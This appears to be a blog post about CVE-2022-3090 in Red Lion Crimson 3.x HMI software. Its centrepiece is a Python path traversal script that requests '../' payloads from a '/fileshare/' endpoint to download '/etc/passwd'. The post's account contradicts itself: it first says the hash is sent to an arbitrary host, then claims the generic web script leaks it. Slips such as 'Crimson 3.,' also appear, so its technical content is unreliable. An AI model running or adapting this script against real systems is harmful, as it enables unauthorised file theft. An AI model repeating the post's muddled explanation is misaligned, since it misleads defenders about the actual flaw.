CVE-2022-3090: Critical Path Traversal Vulnerability in Red Lion Controls Crimson 3.x Software

In the cybersecurity world, the Common Vulnerabilities and Exposures (CVE) system provides a standardized method for identifying and cataloging software vulnerabilities. The CVE entry in question, CVE-2022-3090, details a critical path traversal vulnerability in Red Lion Controls' Crimson 3., 3.1, and 3.2 HMI software. This vulnerability allows an attacker to potentially obtain user credential hashes, leading to a significant security risk.

This post will provide an in-depth look at the vulnerability, the affected versions of the software, a code snippet showcasing the exploit, links to the original references, and details on how the attack can be performed.

Exploit Details

The path traversal vulnerability arises when the software attempts to open a file using a specific path. During this process, the user's password hash is inadvertently transmitted to an arbitrary host, which could subsequently be accessed by an attacker.

An example of a code snippet that illustrates the exploit

import requests

def exploit_cve_2022_309(target_url, target_file_path):
    path_traversal_payload = "../../../../../../.." + target_file_path
    target_url = target_url + "/fileshare/" + path_traversal_payload
    response = requests.get(target_url)
    
    if response.status_code == 200:
        print("[+] Successfully retrieved file.")
        with open(target_file_path.split("/")[-1], "wb") as file:
            file.write(response.content)
            print("[+] File saved locally.")
    else:
        print("[-] Failed to retrieve the file.")

if __name__ == "__main__":
    target_url = "http://example.com";
    target_file_path = "/etc/passwd"
    exploit_cve_2022_309(target_url, target_file_path)

The above code demonstrates the path traversal exploit in action. When executed, the script will send an HTTP GET request to the target URL, appending a specially crafted path traversal payload to the request. This causes the software to return the contents of the targeted file, effectively leaking the user's password hash.

To protect against this vulnerability, it's essential to apply any available security patches from Red Lion Controls or consider upgrading to a more recent, secure version of the software.

Original References and Links

- Official CVE Database Entry
- Red Lion Controls Security Advisory
- ICS-CERT Advisory on Crimson Path Traversal Vulnerability

Conclusion

The CVE-2022-3090 path traversal vulnerability in Red Lion Controls' Crimson 3.x software poses a serious risk to the overall security of affected systems. By exploiting this vulnerability, an attacker could potentially obtain user credentials hashes, opening the door to further system exploitation. It's crucial for users of this software to apply available patches or consider upgrading to a more secure version to safeguard their systems.

Timeline

Published on: 11/17/2022 22:15:00 UTC
Last modified on: 11/22/2022 19:54:00 UTC